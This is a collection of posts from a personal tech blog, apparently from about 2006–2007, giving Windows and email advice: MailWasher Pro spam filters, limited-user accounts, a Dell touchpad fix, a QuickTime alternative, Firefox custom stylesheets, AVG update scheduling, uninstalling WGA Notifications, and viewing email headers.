I use MailWasher Pro, every day, all day long, to screen all of my incoming email for spam, scams and malware, across two dozen POP3 accounts and my custom filter rules usually block almost all incoming spam, scams and malware embedded or attached to email messages. This includes image spam promoting pump and dump stocks or counterfeit drugs, and fraudulent e-card/postcard messages with links to hostile scripts that might turn your PC into a member of a Zombie BotNet. However, as spammers tend to alter their codes occasionally, from one spam run to another, sometimes a previously effective rule will to fail to block a known type of spam. I usually detect these changes and apply them to existing or new filter rules within minutes of discovering a failure to detect and delete that type of spam. I then publish these alterations and/or additions to copies of my filters that are available for copying and pasting into your own MWP filters.txt file. See my extended comments for more information about the location of the Filters.txt file.

The gist of all this is that since I hate spam and spammers I have been updating and fine-tuning my MailWasher Pro filters quite often these days, sometimes more than once per day, to respond to changes in spam runs. You can find my most recently updated/uploaded filter sets on my MailWasher Pro Filters page. Since this is time consuming work I am not too proud to accept PayPal donations from any of you who are benefiting from my ongoing filters work and can afford to make a contribution to the cause. Thanks in advance!

See my MailWasher Pro product details page for complete information about this spam screening tool, with links to download a trial version, or to purchase a permanent license (pay once, get upgrades for life). I am also available for hire to write custom MailWasher filter rules for individuals or organizations. Contact me with your requirements and I'll send you an estimate.

Continue reading "Wizcrafts MailWasher Pro Anti-Spam Filters Updated Frequently" »

Posted by Wiz at 12:28 AM | Permalink

back to top ^

With viruses, spyware, adware, keyloggers, browser/search hijackers, rootkits, and remote control spam relays infecting or taking over control of up to 75% (estimates) of the online Windows computers in the world, responsible, concerned people want to know how they can protect their computers from such rampant, recurring threats. Many folks I know have had spyware or viruses removed only to have them reappear some time later and they are confounded, because they don't realize how these threats get installed in the first place.

Running anti-virus, anti-spyware and firewall applications is a must for Windows users, but they may not stop something malicious that slips past your defenses that may be hidden inside a program or file you intensionally downloaded and installed. The innocent application or utility you downloaded may have installed a backdoor program on your computer and that program may take over control and allow more malware to be sent to your computer. Many of the multiple infections that occur so often are piggybacked onto downloaders that get installed first, without your knowledge. They lower your security settings and sometimes hide from known security programs until it is too late. Some of them even terminate anti-virus, anti-spyware and firewall programs, leaving you totally unprotected.

These hidden threats inside supposedly useful programs are called Trojan Horses, named after the legendary huge wooden gift horse that the Greek invaders gave to the army of Troy, after a lengthy siege. It was supposed to be a symbol of submission from a defeated enemy (the Greek army) to the winners (the Trojans). Somehow the Trojans were fooled into accepting the gift horse, thinking that the Greek army had evacuated the area and given up the siege. They brought it into their gates and celebrated their alleged victory and when they were good and drunk the Greek soldiers who were hidden inside the hollow places in the wooden horse emerged, opened the gates to let in the rest of their hidden army, then slaughtered the Trojan soldiers and men and sold the women and children into slavery. So the legend goes and so go the modern day software soldiers who hide encoded inside seemingly useful programs, only to invade your system and wreak havoc.

Any infected code that you acquire and activate, or is self activating, will be run with the same rights as the logged-on user, which in most cases is Administrator level rights (privileges).

All of the previously mentioned malware threats require computer administrator privileges to fully install themselves into the operating system, or overwrite system files, or to write to the Local_Machine branch of the Windows Registry, or to hide as rootkits. Windows 2000 and XP users running with reduced privileges, as a Limited User, are protected against virtually all malware threats that need to install into the system to function. Windows 2000 or XP Professional Power Users have reduced, but not complete vulnerability to these threats. I personally run as a Power User and have not acquired any drive-by, downloaded, or browser exploited malware infections at all. I also use several anti-spyware programs, and anti-virus program and both hardware and software firewalls. I browse with Firefox, not Internet Explorer and keep everything up to date with patches and security fixes, as soon as I learn about their availability. Then I post notices on my blog to alert you all.

Some of my readers have problems running as Limited Users and I help them as much as possible to understand how things need to be done to work within and around those limitations. If you run with reduced user privileges your choice of updates will be more limited than if you apply them from an administrator level account. You would do this by first applying the updates as a Limited or Power User, then Switch Users or log onto an Administrator account and re-apply the updates and immunizations. Many security programs will require you to switch to, or log into an administrator level account to perform program updates (if not definition updates), then reboot. Others are more friendly to Limited Users after being installed by an Administrator.

I have posted more information about running with reduced user privileges, here and here.

Always assign a strong password to any Computer Administrator level accounts. Always try to run as a Limited User, or at most a Power User, under Windows 2000 or XP Professional. The Power User group is not available in XP Home, so don't bother looking for it.

Windows Vista begins a new era in user protection (out of the box) by running all accounts as Limited Users, with Power User-like rights and rights elevation prompts when you try to do something that requires full administrative privileges. I will blog about Vista's User Account Controls, and it's rights elevation prompts, in a separate article, on a future date.

Posted by Wiz at 11:53 PM | Permalink

back to top ^

I am the happy owner of a used Dell Latitude C610 laptop computer. It hums away on Windows XP Professional, with 512 MB of RAM and a smallish - 20 GB hard drive. The Latitude battery still delivers over 5 hours uptime at full charge. The monitor screen is crisp and bright and I only paid $250 for it in a computer store. My only gripe has been with the mouse pointer wandering on it's own, at random times, for no apparent reason, sometimes completely out of sight.

I did a little online research on Google and found several forums where other Latitude users were complaining about the same wandering / drifting mouse pointer problems as I had (past tense). I read about some pretty drastic solutions some people have used to stop the drifting pointers, including opening up the case and cutting wires. That sounded like a way-too-drastic way to cure the problem. Other suggestions I saw involved opening the case, lifting the keyboard, then inserting an anti-static hardware bag over a metal clip, which supposedly was rubbing against the touch pad's bottom side.

Then in the midst of all this madness I found one voice of sanity from a user who simply downloaded the newest touch pad drivers for his Dell laptop. I followed up that link to the Synaptics website, where they offer generic drivers for their touch pad devices, but also provided links to each manufacturer who uses their touch pads. Dell was listed, so I went to the Dell support site, followed links and options to get to all available downloads for my Latitude C610, scrolled through the long list and finally found an update for the Dell-Synaptic Touch pad. Bingo!

After downloading and installing the new touch pad driver I rebooted (required). When I logged back into Windows I found a new icon in the SysTray, for the Synaptics Touch pad. I opened the new Mouse/Touch-Pad Pointer Properties and went through all of the new options. One option is to disable the Joystick pointer that looks like a pencil eraser, in the midst of the keyboard, or to change it's sensitivity. I opted to make it less sensitive rather than disabling it, and voila, my drifting pointer problem was gone! No cutting of wires, or inserting of bags under the chassis. A simple software download and a few minutes of configuring the awesome new pointer options and all was well with my mouse pointer, on my Dell Latitude. Plus, I took advantage of other new options in the software and enabled horizontal and vertical scroll zones and tap to click on the touch pad.

If you own a Dell laptop and your pointer is drifting all over the place, visit the Dell support website, or the Synaptics website and download the newest driver for your touch pad and operating system.

Posted by Wiz at 6:46 PM | Permalink

back to top ^

Over the past few months there have been a slew of vulnerabilities reported and patched in the Apple QuickTime Player-Plug-in application. QuickTime ships with Apple iTunes when people install that application onto their computers, and millions of other folks install QuickTime to play .mov videos and mp3 files in their browsers. That means that tens or hundreds of millions of computers have QuickTime installed, and knowing the way a lot of people (don't) think about security updates, a large percentage of them are outdated and vulnerable versions of the application. In my previous blog post I revealed six new extremely critical vulnerabilities in Apple's QuickTime Player-Plug-in, revealed in early March, 2007. If you are thinking there has to be a better way to play mp3, .mov and other QuickTime file formats, without leaving your computer open to takeover from exploits against the Apple QuickTime Player, read on.

QuickTime Alternative will allow you to play QuickTime files (.mov, .qt, .3gp and other extensions) without having to install the official QuickTime Player. It also supports QuickTime content that is embedded in webpages. If you browse with Firefox and load a page that has embedded .mp3 or .wav music you have probably seen a yellow notice bar appear telling you that you need to install a missing plug-in to play content on that page. It usually refers to an embedded sound file that normally plays automatically in Internet Explorer and the recommended Firefox plug-in is almost always Apple QuickTime. The QuickTime Alternative satisfies that missing plug-in problem and will automatically playback embedded audio files, after you configure it to do so.

I have been using a free alternative to the QuickTime Player-Plug-in for several years, through various updates. It plays all of the file formats that the official player handles, when configured to play them, more securely than the Apple version. The free QuickTime Alternative player is available from free-codecs.com, on this page. Click on the Download link then look through the list of files for the most recent version, for your operating system. At the time I wrote this the newest version was 1.78, released on March 7, 2007. The alternative player is updated to remain compatible with the file types handled by QuickTime, and is not vulnerable to the same exploits as the official player is. The underlying application behind the QuickTime Alternative is called Media Player Classic, which is updated every time the alternative QuickTime player is updated.

If you decide to install substitute the alternative player you must configure it to handle the file types you want it associated with, as the default player. Details for doing this are in my extended comments.

Also available for free download is a Real Media Alternative Player. Real Alternative will allow you to play RealMedia files without having to install RealPlayer/RealOne Player.

Continue reading "About the QuickTime Alternative Player-Plug-in" »

Posted by Wiz at 3:44 PM | Permalink

back to top ^

This article really falls under the catagory of Usability and Accessibility, as it deals with overriding fonts that are hard to read for some people with sight problems. Viewability has often been overlooked by website template writers who may be young and gifted with very good eyesight, hence they code their fonts to be a fixed size that they find comfortable. Those font sizes are often entirely too small for the elderly, or people with limited sight to resolve. Add to this the fact that web browsers are designed to display web pages as per the styles and fonts specified by the site designers, and that while these fonts sizes can be overridden, it is not always obvious to the users as to how they can do so. Furthermore, even if these folks know how to override default fonts on a webpage, they are forced to do this everytime they revisit that website, since browsers reset to factory default display mode after being closed out and re-opened.

I have often been asked for advise on changing website specified fonts to those preferred by the users, on forums and via direct inquiries (I am the Wiz and am assumed to know all the answers to all the questions!). Instances where this is an issue are typically on forums, where the default stylesheet uses fixed font sizes and/or colors, which the viewer may find difficult to read. People gifted with good eyesight shouldn't goff at this. Your day is coming too.

On a forum where I am the Moderator I was recently asked if it is possible to override the default font size permanently, just for that forum. The administrator is planning to rewrite the stylesheets to allow relative font sizes to be used, which is definitely more user friendly, especially to those with poor eyesight, but until that is accomplished I was able to find a means whereby people using Firefox browsers can create their own custom stylesheet in place of the one used by that forum. The really interesting thing about this custom stylesheet is that it can be specifically targetted to control only the fonts (family, size, color, boldness) on a particular webpage, or for an entire domain. This is good news if you are a frequent reader of a particular forum that uses fixed fonts that you have trouble reading. I have researched a solution for Firefox browser users to override the fonts on a particular website, or even on a particular page or sub-forum. From now on I will refer to this location as the URL.

The rest of this article pertains to the Firefox custom stylesheet workaround. I will publish information for Internet Explorer users in another article.

To begin, you will need find your Firefox Profile folder. Instructions for locating this folder are here, in my extended comments.

The method:
Once you have opened your Firefox Profile folder, open the sub-directory named "Chrome". You will have to create a new text file and name it userContent.css. You can do this in Windows using Notepad, by right-clicking inside the Profile folder and left-clicking on "New," then left-click on "Text document." After you add the pertinent commands to the new text document you should rename it to userContent.css (right-click on file and choose Rename, then type or paste in the new name, then click away from it). Alternately, you can open the sample file named "userContent-example.css" and edit it, then Save As, or Rename it to userContent.css

Here is an example of a custom Firefox Stylesheet to increase the font size, using Percentages or EMs as a measurement, for an exemplified forum URL, where the forum runs on current phpBB code.

@-moz-document url-prefix(http://www.forum.domain.com/) {
.postbody { font-size : 1.2em !important; }
}

Or else, use percentages, like this:

@-moz-document url-prefix(http://www.forum.domain.com/) {
.postbody { font-size : 120% !important; }
}

If the forum's BB code for the class postbody includes a fixed size line-height declaration you can add this to your custom rule: line-height: 1.3em !important;, or line-height: 130% !important;. Alter the em or % number to obtain the best line spacing and to avoid cutting off lower parts of drop letters, like lowercase g, j, p, q, or y.

You would change the URL (http://www.forum.domain.com/) to that of your preferred forum, by copying and pasting it from your browser's address bar. If the forum runs on phpBB code and you want to change the font size in the body of Posts leave the class .postbody as is. Otherwise, you can specify Body to override all font sizes, and use a percentage increase, instead of a set font size. Using the command !important; causes your style rule to override that of the website.

You can discover what stylesheet or css rules are being applied to a web page by viewing the source. In Firefox you press Control + U. Some stylesheets are included in the page you are viewing, within a set of <style> ... </style> tags. Others are in external files. Look in the HEAD section for a line containing; <link rel="stylesheet" type="text/css" src="URL">. Note the location of the external css file as listed in the src=" " part, then highlight and copy it with your mouse. Then go back to the web page in the browser, click on the URL in the address bar, remove any filename and sub-directory that is showing and paste the location of the stylesheet onto the end of the base URL, like this deactivated example:

ht*p://w*w.example.com/templates/site-style.css

If you got it right the stylesheet will display as plain text in the browser, where you can read it or save it as a .css or .txt file. Study the stylesheet to learn about the names of the Classes (names beginning with a period, as in .postbody) and IDs (names beginning with a # sign, like #content), that are assigned font size rules you want to override, and use those class or id names in your custom stylesheet, for that website.

By employing these techniques you can override the preset styles of virtually any website you may frequent, making it easier to view for your eyesight and monitor size situation. I will be posting more information about other techniques to change the font sizes in other articles on my blog.

Continue reading "How to create a custom personal stylesheet for Firefox browsers" »

Posted by Wiz at 11:35 PM | Permalink

back to top ^

CastleCops A new filter set for MWP users brought to you by Wizcrafts!

I just updated my most effective MailWasher Pro image spam filter to catch a new variant; jpegs instead of gifs. The updated filters are here.

The new rule, just under the "Restored From MailWasher Recycle Bin" rule, catches 99% of the image spam sent to me. It uses only one regular expression and is faster acting than the other rules that use more regular expression matches.

If you are not currently using a spam filter and are getting deluged with image spams for penny stocks, the combination of the email screening program MailWasher Pro and my custom MailWasher filters will reduce your visible spam to a tiny percentage of what you are probably seeing right now.

Note: The MailWasher Pro filters.txt does not go into the program directory. It goes into the MailWasherPro subdirectory under Documents and Settings\(your profile)\Application Data\. You can find this direectory and it's contents by opening MailWasher Pro, clicking on "Help," "About" and on the link on the bottom of the "About" box.

Continue reading "MailWasher Pro Image Spam Filters Updated" »

Posted by Wiz at 1:10 PM | Permalink

back to top ^

My regular readers know that I use and promote the email screening program - MailWasher Pro. This inexpensive program screens incoming email for threats or spam, using a combination of blacklists, blocklists, user-reported known spam, "Bayesian" learning filters and best of all, user configurable filter rules. The user filters in MailWasher Pro allow for matching positive or negative words and Regular Expressions and are capable of detecting just about any known type of spam trick that exists, by employing the correct combinations of test conditions.

In my last Blog entry about MailWasher Pro I mentioned that I have developed custom filters to detect and delete image spam with garbage text. This spam is quite prevalent now and is entirely sent from tens of thousands of compromised home and office computers, that have been involuntarily drafted into BotNets, by spammers. Bothered by this senseless spam, mostly for investment stocks, I developed a group of filters that recognize variations of this crap and delete it automatically, without me ever having to see it. I have been fine-tuning my image spam filters to catch variations of the original coding, which is changing every week or two.

A few days ago I was reading new posts on the MailWasher Pro Forum at CastleCops, when I came across a topic where the OP (original poster) was looking for help to block these very image spam messages. I answered with a link to my online copy of my MailWasher Pro filters and made a few people very happy with the solution to this type of spam. Since spammers' techniques change frequently, I have been updating my filters to meet those changes, and posting news in a thread that now has my name in the Title. Additionally, I have been further honored by having my filters linked to in the MailWasher Wiki, on CastleCops.com.

If you are troubled by spam, whether in words or images, and are looking for a way to detect and delete it, without having to read it again, try MailWasher Pro. It is free to try for 30 days and only costs $37.00 USD to register, with free updates for life. You can learn more about MailWasher Pro here. There are links on that page to view my custom filters.

Posted by Wiz at 5:37 PM | Permalink

back to top ^

If you are barraged with spam for junk stocks, with an image and garbage text, and want to put a stop to it clogging up your inbox, MailWasher Pro is the right tool for the job. If you already have a licensed version of MailWasher Pro you probably know how to use custom user created filter rules to detect and delete spam. But, you may not know how to block image-only spam that comes from zombie home and office computers that are part of a BotNet. I have created and tested filter rules to delete this crap off the mail server without ever seeing it. Learn all about MailWasher Pro here.

If you are already using custom filters you just have to add my filters to the MailWasher Pro filters.txt file. This file is located in your profile under Documents and Settings > (Your_Account_Name folder) > Application Data > MailWasher Pro. You will need to set your Folder View Options to display Hidden Files and Folders and to display known file extensions, or these items will not be visible. If you need to set these options follow the instructions in the Extended Comments ("Read more...").

You will see a file named Filters.txt, inside the MailWasher Pro Application Data folder. Open in it Notepad then open my special filter rules: Select all and copy the rules in the popup window, then paste the rules into Filters.txt, near the top of the filters list. Make sure that each rule is on it's own continuous line, starting with [enabled]. Be sure that you do not have any blank spaces after the end of any filter rules, or any blank lines between filter rules. These things cause problems in the program. The last rule in Filters.txt should end after the last character, without a linefeed or carriage return.

Since spammers change their particulars from time to time I will alter these rules, or add new ones to continue to block this senseless spam for junk stocks and all other spam. These and the rest of my custom filters are available on my MailWasher Pro page. To be safe in case a legitimate email is deleted by one of these filter rules I have included a rule to display any email that you restore from the MailWasher Pro Recycle Bin. You should turn on this feature by going to Tools > Options > Summary > Recycle Bin and check the option to restore email, then type a valid email address from which you can send email, into the Outgoing Mail Settings field.

Never, ever buy anything that is advertised in a spam email, and never reply to one. Delete, delete, delete! If you are a reporting member of SpamCop you can also report, report, report! MailWasher Pro has a checkbox to forward spam manually to your SpamCop account, but you must respond to their reply message to actually file the report.

MailWasher Pro is free to try for 30 days, and costs only $37.00 to register, which includes a one year, renewable subscription to the FirstAlert! spam reporting system, plus, FREE Mailwasher program updates for life.

MailWasher Pro has always supported Windows and now supports Mac OS X 10.3 and Linux (for list of supported distributions, please see the download page link on this page).

Continue reading "Automatically Delete Image Spam With MailWasher Pro" »

Posted by Wiz at 1:01 PM | Permalink

back to top ^

Published on 08-19-2006 | Updated on 4-24-2007

Webroot, the manufacturer of Spy Sweeper has released a study which finds that 89% of PCs connected to the Internet contain some spyware/adware infections, with the average home computer hosting 30 different malware programs. Furthermore, according to the Webroot® State of Internet Security report, issued on March 28, 2007, 43 percent of companies surveyed globally have suffered a business disruption due to malware and 60 percent of businesses polled don't have an information security plan.

According to the Webroot study, purveyors of malware are increasingly harnessing the popularity of social networks and Web video to infect PCs. Spyware's threat is getting nastier. Infection rates are on the rise, in part thanks to the surging popularity of social-networking sites like MySpace.com.

"We're finding that the social-networking sites like MySpace are turning out to be hotbeds for spyware," CEO Dave Moll says. "People are creating multiple profiles, and the links on their sites will take you to sites that will either download or drive-by download adware and spyware."

It doesn't help that many younger users aren't sufficiently cautious about where and how they surf the Web, Moll says. "They're not looking out for danger in quite the way that more skeptical adults do," he says. "Kids on MySpace and sites like it act as though they are in a safe youth-only environment, and as a result their behavior is less cautious, and that is something that is being preyed upon by all kinds of Internet villains. And we think spyware creators will be the most aggressive in exploiting that."

Spyware creators are also employing a wider arsenal of weapons. They're piggybacking on other, more malicious types of programs such as rootkits, a type of program that conceals itself, and keyloggers, which record a user's keystrokes on a PC.

All of these infections on Windows PCs are possible in part because so many users are operating the computers with Administrator level privileges. This means that a virus or other malware program has the same rights as you do (full control), over the operating system. If the owners of these computers would switch to using a Limited User account to do their browsing, email and instant messaging the infection rate would drop off the measurable radar.

I have devoted an entire web page to the subject of creating and using Limited or Power User accounts, instead of using the default Administrator level account your computer started with. Go read that page, then create a new Limited or Power User account for your daily use. You can copy your existing settings and preferences to the new account, including your desktop icons and start menu items. Alternately, instead of creating a new Limited User account, create a new "Computer Administrator" account, assigning it a password. Log off the account you are using for everyday use and log onto the new "Computer Administrator" account to set it up as an identity. Once inside that account you can go to Start > Control Panel > User Accounts and change your other account to a "Limited User." When you log back onto your regular account all your icons and settings will still be there, but your user rights will be lowered for your protection.

As a Limited user you cannot install some programs, or uninstall any, nor can you run the Disk Defragmenter or manage accounts and policies. To do these things you can either use the Run As command (explained on the Privileges page), or use the Switch User function to log in to your Administrator level account, do what needs doing, then log off that and log back onto the Limited account.

This really works to protect your computer against virtually all of the current known exploits. If you read the various bulletins released every month by Microsoft, concerning this or that new vulnerability, you'll see a paragraph explaining that the scope of the damage is proportional to the level of privileges on the account you are logged onto. If you are using an account that does not have privileges to create, delete, rename, or alter any files in the operating system directories, the danger from accidentally downloaded malware is close to nil, in that account. This includes the entire crop of browser search hijackers and BHOs. They all depend on being able to write to the local machine branch of the Windows Registry to do their dirty work. Furthermore, if something does manage to attach itself to your browser, under a Limited Account, it cannot jump across identities to infect the administrator account, or other user accounts. Also, viruses and spyware cannot disable your anti-virus, or anti spyware, or firewall programs, from within a Limited User account, but those programs can go after the attackers and remove them before they find a way to install into the system.

Read about an exploit that masquerades as a video decoder to install the Zlob Trojan -->

Continue reading "Limited User Privileges Protect PCs From Adware, Rootkits, Spyware and Viruses" »

Posted by Wiz at 4:37 PM | Permalink

back to top ^

I was recently participating in a forum discussion about AVG Free anti virus and one of the members complained that AVG's scheduler would a: only check for updates once a day, and b: not look for updates at all when his computer was in standby mode. I researched a solution that I have tested on my own computer and seems to work fine.

I used Windows Task Scheduler to create a task to wake the computer (if asleep) and run the AVG Updater from the scheduler commandline, then automatically either fetch and install an available update, or instantly exit if no update is available at that moment. You can create multiple daily schedules with Windows Task Scheduler, but only one daily with the AVG Free scheduler. Note, that if you create an hourly schedule you should not select the option to wake the computer to run the task!

The steps to create the schedule and the commandline used are listed below.

* Go to Start > All Programs > Accessories > System Tools > Scheduled Tasks
* Open the Task Scheduler and double-click on Add Scheduled Task
* When the Scheduled Tasks Wizard opens click on Next
* When the second tab opens you will have to use the Browse button to locate the AVG program and it's updater file
* If you installed AVG into the default directory, navigate to Program Files\Grisoft\AVG Free\avginet.exe and double-click on that file to add it to the scheduler. Type a name for this task; e.g. AVG Updater
* Click on Daily to choose that option, then click Next
* Set the time of day you want it to run, Every Day, and the Start Date, then click Next
* Your account name should be in the User Name field. Type and retype your login password to authorize the scheduled task and click on Next
* Check the option to open the Advanced Properties when you click Finish
* Click on the Settings tab
* "Wake the computer to run this task" is optional but not recommended for hourly tasks. But if you choose to enable it, check the box and click Apply. Click OK. Your task is almost ready to run, but needs at least one edit. Unless you edit the commandline as follows it will not download an update unless you click on the prompt box. My edit bypasses that prompt and automatically downloads and installs updates.
* Go back to the Scheduled Tasks window and locate your new task and double click on it to open it's properties box. You should see this command: "C:\Program Files\Grisoft\AVG Free\avginet.exe"
* Add a space to the end of that command (spacebar) then type this exactly: /SCHED=
* The final command should be: "C:\Program Files\Grisoft\AVG Free\avginet.exe" /SCHED=
* If you are prompted for your user name and password type them in and click OK. If you don't use a password just press Enter.
* You can also modify the schedule from the Schedule Properties by clicking on the Schedule Tab and the Advanced button, where you can schedule it to run any number of times at any interval.
* When you are done editing the schedule click on Apply, then OK, to close the task properties.

Using those steps should wake your computer if it is in standby or hibernation, then poll for updates and download any that are available. It works on my Windows XP Professional computer, using AVG Free, version 7.x.

Wiz

Continue reading "Using Windows Task Scheduler to Check for/install AVG-Free Anti Virus Updates | Commandline | Wakes Computer" »

Posted by Wiz at 9:52 AM | Permalink

back to top ^

If you have inadvertently installed Microsoft Windows Genuine Advantage (WGA) Notifications and are getting popup notices concerning the validity of your operating system, these instructions will help you to remove this optional (at this moment) Windows component.

SUMMARY
This article applies to the version of Microsoft Windows Genuine Advantage (WGA) Notifications that is distributed during the pilot program. For example, this version is included in the pre-release version that accompanies the Microsoft Software License Terms. To safely and easily uninstall the pilot version, you must install the general release version of WGA Notifications. If you do not install this version, you can follow the steps in this article to disable or uninstall the pilot version.

Important These instructions have not been tested on the general release version of the WGA Notifications. Therefore, these instructions are not supported. Microsoft will offer the general release version of WGA Notifications to users who uninstall the pilot version at a later date. These users will obtain the general release version through the Microsoft Automatic Update service. WGA Notifications is part of the Windows Genuine Advantage program.

When you use a non-genuine version of Windows, you receive a message when you log on that states that the copy of Windows appears to be non-genuine. Then, you are directed to the WGA Web site to learn more. If you do not want to obtain a genuine copy of Windows, you receive periodic messages that notify you that the copy of Windows appears to be non-genuine.

Note If you are running a genuine copy of Windows and want to use WGA Notifications, you may receive messages to update Windows XP.

Regardless of genuine status, users are not denied access to critical updates. However, users who have not validated their computers as genuine are not able to install other updates such as those for Microsoft Internet Explorer 7.0 and Microsoft Windows Defender.

MORE INFORMATION
Warning Serious problems might occur if you modify the registry incorrectly by using Registry Editor or by using another method. These problems might require that you reinstall your operating system. Microsoft cannot guarantee that these problems can be solved. Modify the registry at your own risk.

Disable WGA Notifications
1. Log on to the computer by using an account that has administrative permissions.
2. Make sure that the WGA Notifications version that exists on the computer is a pilot version. The version format for the pilot version is 1.5.0532.x. In this case, you can uninstall versions 527-532 only. For example, you can uninstall versions that range from 1.5.0527.0 to 1.5.0532.2. To find the WGA Notifications version, follow these steps:
a. Click Start, and then click Control Panel.
b. Double-click Add or Remove Programs, locate and then click Windows XP - Software, then click Windows Genuine Advantage Notifications, and then click Click here for support information.
c. In the Support Info dialog box, verify the version number, and then click Close.
3. Rename the following files by changing the extension to .old:
• Rename %Windir%\system32\WgaLogon.dll to %Windir%\system32\WgaLogon.old
• Rename %Windir%\system32\WgaTray.exe to %Windir%\system32\WgaTray.old
4. Restart the computer.

Manually uninstall WGA Notifications
1. Log on to the computer by using an account that has administrative permissions.
2. Make sure that the WGA Notifications version that exists on the computer is a pilot version. The version format for the pilot version is 1.5.0532.x. In this case, you can uninstall versions 527-532 only. For example, you can uninstall versions that range from 1.5.0527.0 to 1.5.0532.2. To find the WGA Notifications version, follow these steps:
a. Click Start, and then click Control Panel.
b. Double-click Add or uninstall Programs, locate and then click Windows Genuine Advantage Notifications, and then click Click here for support information.
c. In the Support Info dialog box, verify the version number, and then click Close.
3. Rename the following files by changing the extension to .old:
• Rename %Windir%\system32\WgaLogon.dll to %Windir%\system32\WgaLogon.old
• Rename %Windir%\system32\WgaTray.exe to %Windir%\system32\WgaTray.old
4. Restart the computer.
5. Unregister LegitCheckControl.dll by using Regsvr32. To do this, follow these steps:
a. Click Start, click Run, type cmd, and then click OK.
b. At the command prompt, type the following, and then press ENTER:
Regsvr32 %Windir%\system32\LegitCheckControl.dll /u
6. Restart the computer.
7. Click Start, click Run, type cmd, and then click OK.
8. At the command prompt, delete the following files by typing the Del command. Press ENTER after you type each command.
• Del %Windir%\system32\wgalogon.old
• Del %Windir%\system32\WgaTray.old
• Del %Windir%\system32\LegitCheckControl.dll
9. At the command prompt, type regedit.
10. Locate and then right-click the following registry subkeys. Click Delete after you locate each subkey.
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\ CurrentVersion\Winlogon\Notify\WgaLogon
• HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows \CurrentVersion\Uninstall\WgaNotify

Continue reading "How to disable or uninstall the pilot version of Microsoft Windows Genuine Advantage Notifications" »

Posted by Wiz at 10:37 PM | Permalink

back to top ^

"Spam," in computer-speak, refers to Unsolicited, Commercial Email (UCE) or "Junkmail." Spam is used to hawk everything from counterfeit brand name watches and prescription drugs, to mortgages and loans. Nobody I know wants to receive junk mail, whether in their postal mailbox or computer inbox. Yet, most people who venture online with an email account will be spammed, some to the point where spam email represents 80% of their weekly incoming email. These folks are in serious need of a real solution to help reduce the level of spam that reaches their inboxes. I am going to describe a solution to your email spam problem in this post.

Before I continue with my solution I have to tell you that it is software based screening program that does not work with browser-based email systems (AOL, Yahoo, Webmail, or other proprietary email systems). You must be receiving your email via a separate stand-alone POP3 email "client," like Outlook, Outlook Express, Euroda, Thunderbird, or a similar email program. If you are using one of these stand-alone email clients the rest of this discussion applies to you. If not, you are at the mercy of your ISP or email service provider to filter out spam and viruses.

My solution to dealing with spam is to screen all incoming email and filter out anything that trips one of the filter conditions, or is otherwise identified by it's content as a phishing attempt, 419-type scam, spam or virus. The program that does this is named MailWasher Pro and I've been using it for several years, and recommend it to all of my friends and clients.

MailWasher Pro intercepts incoming POP3 email accounts (as many as you have setup in it), reads an adjustable number of lines of text, including the full incoming headers, then compares the results with internal and external blacklists and blocklists, and databases of known spam, and sources of spam, as well as known or suspected viruses. MailWasher Pro also contains a built-in Bayesian Learning Filter that you can train to recognize what you call spam and what you don't. Lastly, one of the most powerful features is the user created filters that can be customized to identify virtually any type of undesirable email and either mark it for manual deletion and blacklisting, or automatically delete it immediately. These user filters use both plain text and Regular Expressions to identify strings of text or code that give away a spam message, or virus, or exploit.

If the message contains content that matches any known conditions it is either flagged to be deleted or is automatically deleted from the email server, according to your choices when you set it up. If you are a member of SpamCop MailWasher Pro can forward spam messages directly to your reporting account. SpamCop will generate an autoreply message that contains a link that you must click on to finish the reporting process, because they require manual reports to be filed at all times. Still, this saves you the trouble of displaying the source code, then copying it and pasting it into a browser report field on SpamCop's reporting page.

I have created an entire web page detailing MailWasher Pro and how it works. I have also included a link on that page to a sample of my custom filters that are responsible for eliminating huge amounts of spam, including "image spam." It should be noted that spammer techniques are not standing still and neither are my efforts to create effective rules to counter new spam tricks.

MailWasher Pro is a commercial program that is free to try for 30 days. If you wish to continue using it you will have to pay to license it. The current registration price is $37.00, which includes Free Upgrades for Life. It also includes your first year subscription to the optional FirstAlert! members' reporting system. You can read all about this on my MailWasher Pro web page.

You can go straight to the MailWasher Pro website and download a 30 day trial, by clicking on this link:
Download Mailwasher Pro here

Continue reading "MailWasher Pro Screens Incoming Email and Filters Out Spam and Viruses" »

Posted by Wiz at 10:25 PM | Permalink

back to top ^

Everybody who has an email account is plagued by the spam and scam epidemic that is polluting your inboxes. Most people simply deal with having to resort to hitting Delete over and over again. Others, like yours truly, do something about it. I report all spam that gets through my defenses to SpamCop, where I have a Reporting Member account. I also use an email screening program that automatically deletes most spam, which I will talk about later in this article.

The SpamCop reporting system requires you to be able to display, copy and paste the complete message source, including the normally hidden headers. Displaying an email's source code is what this article is about. Even if you are not a SpamCop reporting member learning how to read the headers will allow you to trace the origin of scam emails (links in extended comments) from financial fraud artists in countries like Nigeria, and to file complaints with the Internet Service Providers that provide the connections to the scammers or spammers.

I am frequently asked "how do I display email headers and source code?" The methods vary with the email client (program), but every one I have seen will offer some means of displaying the full incoming headers. The following sections cover Microsoft Outlook and Outlook Express, Hotmail, Gmail and Yahoo! browser-based email.

MS Outlook
Double click the message to open it in its own window. Then click View-Options and you can view the data in the "Internet headers" pane. You can copy that data and paste it into another email or SpamCop report.

Outlook Express
If the message is not open, right-click on the message in your Inbox and select Properties > Details > Message Source (button).

If the message is already open, simply press Control and F3 (together) and the "Message Source" window will appear. Once the source code is displayed in the resizable window you can copy it and paste it into a report.

Hotmail
If you are using browser-based Hotmail, login and go to "Options." At the Options page click the link labeled "Mail Display Settings" and find the section "Message Headers." Put the dot in the option "Full." Click on "OK" at the bottom to save your changes. Now, when you get a scam email and Forward it the recipient can read the full headers.

You can reveal the complete source code of any email in Hotmail by opening the message and looking for the blue link labeled "View E-mail Message Source," just above the white email message body. The source will open in a new browser window, and can be copied and pasted.

Gmail
After logging into your Gmail account in your browser, open the email you want to inspect. Look to the right side along the top of the message for three vertical dots. Click on the three dots to open an options menu. Move your pointer down to "Show Original" and click on it. A new tab will open containing the original incoming headers.

Yahoo!
If you use Yahoo! email, login and click on "Mail Options." When the options page loads locate the section labeled Personalization and click on the link labeled "General Preferences." On the General Preferences" page scroll to "Messages" and put the dot in the radio choice labeled "Show ALL Headers."

To forward the headers with an email scam or spam, scroll down farther to "Message Actions" and find "Forwarding Messages." Select the radio choice to "Forward as Inline Text." Click the "Save" button at the bottom. After this all you have to do is Forward any scam emails and the full headers will be at the top of the message.

